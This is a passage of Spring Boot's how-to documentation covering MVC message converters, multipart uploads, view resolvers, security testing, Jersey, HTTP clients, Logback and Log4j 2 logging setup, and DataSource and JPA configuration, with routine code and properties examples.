`@RestController`).\nYou can contribute additional converters by adding beans of the appropriate type in a Spring Boot context.\nIf a bean you add is of a type that would have been included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON conversions), it replaces the default value.\nA convenience bean of type `HttpMessageConverters` is provided and is always available if you use the default MVC configuration.\nIt has some useful methods to access the default and user-enhanced message converters (For example, it can be useful if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also contribute converters by overriding the `configureMessageConverters` method.\nHowever, unlike with normal MVC, you can supply only additional converters that you need (because Spring Boot uses the same mechanism to contribute its defaults).\nFinally, if you opt out of the Spring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration, you can take control completely and do everything manually by using `getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading files.\nBy default, Spring Boot configures Spring MVC with a maximum size of 1MB per file and a maximum of 10MB of file data in a single request.\nYou may override these values, the location to which intermediate data is stored (for example, to the `\/tmp` directory), and the threshold past which data is flushed to disk by using the properties exposed in the `MultipartProperties` class.\nFor example, if you want to specify that files be unlimited, set the configprop:spring.servlet.multipart.max-file-size[] property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as a `@RequestParam`-annotated 
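parameter of type `MultipartFile` in a Spring MVC controller handler method, as the following minimal sketch shows (the mapping, parameter name, and storage strategy are illustrative):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Controller\n\tpublic class MyUploadController {\n\n\t\t@PostMapping(\"\/upload\")\n\t\t@ResponseBody\n\t\tpublic String handleUpload(@RequestParam(\"file\") MultipartFile file) throws IOException {\n\t\t\t\/\/ a real application would validate the upload and store it properly\n\t\t\tfile.transferTo(Files.createTempFile(\"upload-\", \".tmp\"));\n\t\t\treturn \"Received \" + file.getOriginalFilename();\n\t\t}\n\n\t}\n----\n\nTo recap, the uploaded file arrives as a `@RequestParam`-annotated 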
parameter of type `MultipartFile` in a Spring MVC controller handler method.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/MultipartAutoConfiguration.java[`MultipartAutoConfiguration`] source for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads rather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`).\nIf you would rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\",configprops]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or `ServletRegistrationBean` for each and Spring Boot will register them transparently to the container.\nBecause servlets are registered that way, they can be mapped to a sub-context of the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a `@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of your custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own `@Configuration` with the `@EnableWebMvc` annotation.\nDoing so leaves all MVC configuration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in `@Controller` to actual `View` implementations.\nNote that `ViewResolvers` are mainly used in UI applications, rather than REST-style services (a `View` is not used to render a `@ResponseBody`).\nThere are many implementations of `ViewResolver` to choose from, and Spring on its own is not opinionated about which ones you should use.\nSpring Boot, on the other hand, installs one or two for you, depending on what it finds on the classpath and in the application context.\nThe `DispatcherServlet` uses all the resolvers it finds in the application context, trying each one in turn until it gets a result.\nIf you add your own, you have to be aware of the order and in which position your resolver is added.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'.\n This one locates physical resources that can be rendered by using the `DefaultServlet` (including static resources and JSP pages, if you use those).\n It applies a prefix and a suffix to the view name and then looks for a physical resource with that path in the servlet context (the defaults are both empty but are accessible for external configuration through `spring.mvc.view.prefix` and `spring.mvc.view.suffix`).\n You can override it by providing a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'.\n This is a useful member of the view resolver chain and picks up any beans with the same name as the `View` being resolved.\n It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are* actually beans of type `View` present.\n This is a '`master`' resolver, delegating to all the others and attempting to find a match to 
the '`Accept`' HTTP header sent by the client.\n There is a useful https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`] that you might like to study to learn more, and you might also look at the source code for detail.\n You can switch off the auto-configured `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named '`thymeleafViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.thymeleaf.prefix`, and the suffix is `spring.thymeleaf.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.html`', respectively.\n You can override `ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named '`freeMarkerViewResolver`'.\n It looks for resources in a loader path (which is externalized to `spring.freemarker.templateLoaderPath` and has a default value of '`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix.\n The prefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to `spring.freemarker.suffix`.\n The default values of the prefix and suffix are empty and '`.ftlh`', respectively.\n You can override `FreeMarkerViewResolver` by providing a bean of the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you also have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'.\n It looks for resources in a loader path by surrounding the view name with a prefix and suffix (externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\n The prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`', respectively.\n You can override `GroovyMarkupViewResolver` by providing a bean of the same name.\n* If you use Mustache, you also have a `MustacheViewResolver` named '`mustacheViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.mustache.prefix`, and the suffix is `spring.mustache.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.mustache`', respectively.\n You can override `MustacheViewResolver` by providing a bean of the same name.\n\nFor more detail, see the following sections:\n\n* {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user that has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and this can also be used when 
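testing controllers with the `@WebMvcTest` slice and `MockMvc`, as shown in the following sketch (`MyController` is a hypothetical controller under test):\n\n[source,java,indent=0]\n----\n\t@WebMvcTest(MyController.class)\n\tpublic class MyControllerTests {\n\n\t\t@Autowired\n\t\tprivate MockMvc mvc;\n\n\t\t@Test\n\t\t@WithMockUser(roles=\"ADMIN\")\n\t\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\t\tthis.mvc.perform(get(\"\/\"));\n\t\t}\n\n\t}\n----\n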
\nFor additional details on Spring Security's testing support, refer to Spring Security's {spring-security-docs}#test[reference documentation].\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey Endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same way as it can be used to secure a Spring MVC-based web application.\nHowever, if you want to use Spring Security's method-level security with Jersey, you must configure Jersey to use `setStatus(int)` rather than `sendError(int)`.\nThis prevents Jersey from committing the response before Spring Security has had an opportunity to report an authentication or authorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true` on the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-jersey-alongside-another-web-framework]]\n=== Use Jersey Alongside Another Web Framework\nTo use Jersey alongside another web framework, such as Spring MVC, configure it so that the other framework can handle the requests that Jersey cannot.\nFirst, configure Jersey to use a filter rather than a servlet by setting the configprop:spring.jersey.type[] application property to `filter`.\nSecond, configure your `ResourceConfig` to forward requests that would have resulted in a 404, as shown in the following example.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t\tproperty(ServletProperties.FILTER_FORWARD_ON_404, true);\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\nSpring Boot offers a number of starters that work with HTTP clients.\nThis section answers questions related to using them.\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>, you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized `RestTemplate`.\nThis is the recommended approach for creating a `RestTemplate` configured to use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request factory that is being used.\nThe following example configures `HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts except `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n[[howto-webclient-reactor-netty-customization]]\n=== Configure the TcpClient used by a Reactor Netty-based WebClient\nWhen Reactor Netty is on the classpath, a Reactor Netty-based `WebClient` is auto-configured.\nTo customize the client's handling of network connections, provide a `ClientHttpConnector` bean.\nThe following example configures a 60-second connect timeout and adds a `ReadTimeoutHandler`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/reactive\/function\/client\/ReactorNettyClientCustomizationExample.java[tag=custom-http-connector]\n----\n\nTIP: Note the use of `ReactorResourceFactory` for 
the connection provider and event loop resources.\nThis ensures efficient sharing of resources for the server receiving requests and the client making requests.\n\n\n\n[[howto-logging]]\n== Logging\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which is typically provided by Spring Framework's `spring-jcl` module.\nTo use https:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on `spring-boot-starter-logging`.\nFor a web application, you need only `spring-boot-starter-web`, since it depends transitively on the logging starter.\nIf you use Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on the content of the classpath.\nIf Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers, you can do so in `application.properties` by using the `logging.level` prefix, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the console) by using `logging.file.name`.\n\nTo configure the more fine-grained settings of a logging system, you need to use the native configuration format supported by the `LoggingSystem` in question.\nBy default, Spring Boot picks up the native configuration from its default location for the system (such as `classpath:logback.xml` for Logback), but you can set the location of the config file by using the configprop:logging.config[] property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you need to apply customizations to Logback beyond those that can be achieved with `application.properties`, you need to add a standard Logback configuration file.\nYou can add a `logback.xml` file to the root of your classpath for Logback to find.\nYou can also use `logback-spring.xml` if you want to use the <<spring-boot-features.adoc#boot-features-logback-extensions,Spring Boot Logback extensions>>.\n\nTIP: The Logback documentation has a https:\/\/logback.qos.ch\/manual\/configuration.html[dedicated section that covers configuration] in some detail.\n\nSpring Boot provides a number of Logback configurations that can be `included` from your own configuration.\nThese includes are designed to allow certain common Spring Boot conventions to be re-applied.\n\nThe following files are provided under `org\/springframework\/boot\/logging\/logback\/`:\n\n* `defaults.xml` - Provides conversion rules, pattern properties, and common logger configurations.\n* `console-appender.xml` - Adds a `ConsoleAppender` using the `CONSOLE_LOG_PATTERN`.\n* `file-appender.xml` - Adds a `RollingFileAppender` using the `FILE_LOG_PATTERN` and `ROLLING_FILE_NAME_PATTERN` with appropriate settings.\n\nIn addition, a legacy `base.xml` file is provided for compatibility with earlier versions of Spring Boot.\n\nA typical custom `logback.xml` file would look something like 
this:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/console-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"CONSOLE\" \/>\n\t\t<\/root>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nYour logback configuration file can also make use of System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file.name` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.file.path` (representing a directory for log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set in Boot's external configuration.\n* `$\\{ROLLING_FILE_NAME_PATTERN}`: Whether `logging.pattern.rolling-file-name` was set in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in a log file) by using a custom Logback converter.\nSee the `CONSOLE_LOG_PATTERN` in the `defaults.xml` configuration for an example.\n\nIf Groovy is on the classpath, you should be able to configure Logback with `logback.groovy` as well.\nIf present, this setting is given preference.\n\nNOTE: Spring extensions are not supported with Groovy configuration.\nAny `logback-spring.groovy` files will not be detected.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom `logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file.name` to your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.file.name=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x\/[Log4j 2] for logging configuration if it is on the classpath.\nIf you use the starters for assembling dependencies, you have to exclude Logback and then include log4j 2 instead.\nIf you do not use the starters, you need to provide (at least) `spring-jcl` in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some jiggling with excludes.\nThe following example shows how to set up the starters in 
Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation 'org.springframework.boot:spring-boot-starter-web'\n\t\timplementation 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging requirements (such as having Tomcat use `java.util.logging` but configuring the output using Log4j 2).\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into Log4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK logging adapter] by setting the `java.util.logging.manager` system property to `org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON configuration files.\nTo configure Log4j 2 to use an alternative configuration file format, add the appropriate dependencies to the classpath and name your configuration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75a,15a\"]\n|===\n| Format | Dependencies | File names\n\n|YAML\n| `com.fasterxml.jackson.core:jackson-databind` + `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\n| `log4j2.yaml` + `log4j2.yml`\n\n|JSON\n| `com.fasterxml.jackson.core:jackson-databind`\n| `log4j2.json` + `log4j2.jsn`\n|===\n\n\n\n[[howto-data-access]]\n== Data Access\nSpring Boot includes a number of starters for working with data sources.\nThis section answers questions related to doing so.\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database initialization.\nIf you need to externalize some settings, you can bind your `DataSource` to the environment (see \"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your 
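`FancyDataSource` has regular JavaBean properties for the URL, the username, and the pool size, these settings are bound automatically before the `DataSource` is made available to other components.\nAs a minimal sketch (extending Spring's `AbstractDataSource` for brevity; the pooling logic is elided because only the bindable JavaBean properties matter here), such a class might look as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic class FancyDataSource extends AbstractDataSource {\n\n\t\tprivate String url;\n\n\t\tprivate String username;\n\n\t\tprivate int poolSize;\n\n\t\t@Override\n\t\tpublic Connection getConnection() throws SQLException {\n\t\t\t\/\/ a real implementation would hand out pooled connections\n\t\t\treturn DriverManager.getConnection(this.url, this.username, null);\n\t\t}\n\n\t\t@Override\n\t\tpublic Connection getConnection(String username, String password) throws SQLException {\n\t\t\treturn DriverManager.getConnection(this.url, username, password);\n\t\t}\n\n\t\t\/\/ getters and setters for url, username and poolSize ...\n\n\t}\n----\n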
\nThe regular <<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens (so the relevant subset of `spring.datasource.*` can still be used with your custom configuration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can be used to create one of the standard data sources (if it is on the classpath).\nThe builder can detect the one to use based on what's available on the classpath.\nIt also auto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection information.\nPool-specific settings can also be provided.\nCheck the implementation that is going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch.\nBecause the actual type of the connection pool is not exposed, no keys are generated in the metadata for your custom `DataSource` and no completion is available in your IDE (because the `DataSource` interface exposes no properties).\nAlso, if you happen to have Hikari on the classpath, this basic setup does not work, because Hikari has no `url` property (but does have a `jdbcUrl` property).\nIn that case, you must rewrite your configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated implementation rather than `DataSource`.\nYou cannot change the implementation at runtime, but the list of options will be explicit.\n\nThe following example shows how to create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is, by providing a default embedded database with a sensible username and password if no URL is provided.\nYou can easily initialize a `DataSourceBuilder` from the state of any `DataSourceProperties` object, so you could also inject the `DataSource` that Spring Boot creates automatically.\nHowever, that would split your configuration into two namespaces: `url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on your custom namespace (`app.datasource`).\nTo avoid that, you can redefine a custom `DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except 
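that a dedicated connection pool is chosen (in code) and its settings are exposed in the `app.datasource.configuration` sub-namespace.\nA minimal sketch of that arrangement, assuming Hikari is on the classpath, might look as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@Primary\n\t@ConfigurationProperties(\"app.datasource\")\n\tpublic DataSourceProperties dataSourceProperties() {\n\t\treturn new DataSourceProperties();\n\t}\n\n\t@Bean\n\t@ConfigurationProperties(\"app.datasource.configuration\")\n\tpublic HikariDataSource dataSource(DataSourceProperties properties) {\n\t\t\/\/ DataSourceProperties takes care of the url\/jdbcUrl translation\n\t\treturn properties.initializeDataSourceBuilder().type(HikariDataSource.class).build();\n\t}\n----\n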
\nBecause `DataSourceProperties` takes care of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings under `spring.datasource.hikari`.\nThis example uses the more generic `configuration` sub-namespace because the example does not support multiple data source implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type` has no effect.\nIn practice, the builder is initialized with whatever value you might set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the \"`Spring Boot features`\" section and the {spring-boot-autoconfigure-module-code}\/jdbc\/DataSourceAutoConfiguration.java[`DataSourceAutoConfiguration`] class for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are described in the previous section.\nYou must, however, mark one of the `DataSource` instances as `@Primary`, because various auto-configurations down the road expect to be able to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off.\nIn the following example, we provide the _exact_ same feature set as the auto-configuration provides on the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database initializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations.\nFor instance, you could configure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same logic as Spring Boot would use in auto-configuration.\nNote that each `configuration` sub-namespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in the same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on your 
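classpath.\nThere is a `spring-boot-starter-data-jpa` for JPA, a `spring-boot-starter-data-mongodb` for MongoDB, and so on.\nTo get started, create some repository interfaces to handle your `@Entity` objects.\nAs a minimal sketch (assuming JPA and a hypothetical `City` entity), a repository is just an interface, and Spring Data creates the implementation for you:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic interface CityRepository extends JpaRepository<City, Long> {\n\n\t\tList<City> findByName(String name);\n\n\t}\n----\n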
Spring Boot tries to guess the location of your `@Repository` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, use the `@EnableJpaRepositories` annotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, you can use the `@EntityScan` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as those for SQL logging), and Spring Boot exposes those options and a few more for Hibernate as external configuration properties.\nSome of them are automatically detected according to the context, so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` property is a special case, because, depending on runtime conditions, it has different defaults.\nIf an embedded database is used and no schema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to `create-drop`.\nIn all other cases, it defaults to `none`.\n\nThe dialect to use is detected by the JPA provider.\nIf you prefer to set the dialect yourself, set the configprop:spring.jpa.database-platform[] property.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n[WARNING]\n====\nYou need to ensure that names defined under `+spring.jpa.properties.*+` exactly match those expected by your JPA provider.\nSpring Boot will not attempt any kind of relaxed binding for these entries.\n\nFor example, if you want to configure Hibernate's batch size, you must use `+spring.jpa.properties.hibernate.jdbc.batch_size+`.\nIf you use other forms, such as `batchSize` or `batch-size`, Hibernate will not apply the setting.\n====\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating the `EntityManagerFactory`.\nThis takes precedence over anything that is applied by the auto-configuration.
